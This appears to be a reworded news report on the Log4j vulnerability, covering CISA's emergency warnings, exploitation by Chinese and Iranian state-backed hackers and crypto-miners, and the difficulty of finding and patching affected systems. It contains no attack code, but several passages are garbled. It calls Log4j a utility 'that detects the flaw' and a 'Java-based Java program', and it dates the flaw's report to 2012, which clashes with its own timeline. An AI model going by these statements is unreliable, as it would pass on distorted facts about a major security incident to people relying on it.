BOSTON — Security pros say it’s one of the worst computer vulnerabilities they’ve ever seen. It has been seized by state-backed hackers from Iran and China, as well as rogue cryptocurrency miners.
The Department of Homeland Security is sounding a dire alarm, ordering federal agencies to urgently eliminate the bug because it’s so easily exploitable — and telling those with public-facing networks to put up firewalls if they can’t be sure. This software can be small, and is not often documented.
Log4j is a commonly used utility that detects the flaw. This allows web-based attackers easy access to all aspects of industrial control systems, consumer electronics, and web servers. It is difficult to identify which system uses the utility. Many layers of software cover it.
The top U.S. cybersecurity defense official, Jen Easterly, deemed the flaw “one of the most serious I’ve seen in my entire career, if not the most serious” in a call Monday with state and local officials and partners in the private sector. Publicly disclosed last Thursday, it’s catnip for cybercriminals and digital spies because it allows easy, password-free entry.
CISA, the Cybersecurity and Infrastructure Security Agency Easterly oversees, created a resource page Tuesday in an effort to fix a vulnerability it believes is found on hundreds of millions devices. Germany activated its own national IT crisis center, while other countries with high levels of computerization were also taking the issue seriously.
Dragos, an industrial control cybersecurity company, stated that a wide range of crucial industries were breached, including transportation, electric power, water and food. “I think we won’t see a single major software vendor in the world — at least on the industrial side — not have a problem with this,” said Sergio Caltagirone, the company’s vice president of threat intelligence.
Eric Goldstein, who heads CISA’s cybersecurity division, said Washington was leading a global response. His statement said that no compromised federal agency was known. However, these are very early days.
“What we have here is a extremely widespread, easy to exploit and potentially highly damaging vulnerability that certainly could be utilized by adversaries to cause real harm,” he said.
One small bit of code can make a huge difference in the world.
This Java-based Java program logs users’ activity. The software was created and maintained under the supervision of the Apache Software Foundation by a small group of volunteers. It is highly popular with commercial programmers. It runs across many platforms — Windows, Linux, Apple’s macOS — powering everything from web cams to car navigation systems and medical devices, according to the security firm Bitdefender.
Goldstein informed reporters on Tuesday night’s conference call that CISA would update an inventory of software patches as new fixes became available. Many times Log4j embeds in third-party software that must be updated by the owners. “We expect remediation will take some time,” he said.
Apache Software Foundation reported that Alibaba, the Chinese tech giant, had notified the Foundation of the flaw Nov. 24, 2012. The fix took over two weeks to create and publish.
Beyond patching to fix the flaw, computer security pros have an even more daunting challenge: trying to detect whether the vulnerability was exploited — whether a network or device was hacked. This will require weeks of monitoring. A frantic weekend of trying to identify — and slam shut — open doors before hackers exploited them now shifts to a marathon.
Storm before Lull
“A lot of people are already pretty stressed out and pretty tired from working through the weekend — when we are really going to be dealing with this for the foreseeable future, pretty well into 2022,” said Joe Slowik, threat intelligence lead at the network security firm Gigamon.
Check Point, a cybersecurity company, said Tuesday that it had detected over half a million malicious attempts to find the flaw in corporate networks around the world. It said the flaw was exploited to plant cryptocurrency mining malware — which uses computer cycles to mine digital money surreptitiously — in five countries.
No ransomware exploiting the flaw has been found. But experts say that’s probably just a matter of time.
“I think what’s going to happen is it’s going to take two weeks before the effect of this is seen because hackers got into organizations and will be figuring out what to do to next.” John Graham-Cumming, chief technical officer of Cloudflare, whose online infrastructure protects websites from online threats.
We’re in a lull before the storm, said senior researcher Sean Gallagher of the cybersecurity firm Sophos.
“We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on.” That would include extracting usernames and passwords.
John Hultquist of cybersecurity firm Mandiant said the Chinese state-backed hacker group, as well as Iranian hackers, have already exploited this flaw for cyberespionage. Other state actors are expected to follow suit, John Hultquist stated. He wouldn’t name the target of the Chinese hackers or its geographical location. He said the Iranian actors are “particularly aggressive” and had taken part in ransomware attacks primarily for disruptive ends.
Software design: Insecure
Experts believe that Log4j is a poor example of software design. Security is not a priority for too many of the programs that are used in crucial functions.
Slowik from Gigamon stated that Open-source developers such as those responsible for Log4j are not to blame.
Popular and custom-made applications often lack a “Software Bill of Materials” that lets users know what’s under the hood — a crucial need at times like this.
“This is becoming obviously more and more of a problem as software vendors overall are utilizing openly available software,” said Caltagirone of Dragos.
Particularly in industrial systems, he said, analog systems that were once used in every aspect of food production and water utility have been digitally updated over the past decade to enable remote control and automated maintenance. “And one of the ways they did that, obviously, was through software and through the use of programs which utilized Log4j,” Caltagirone said.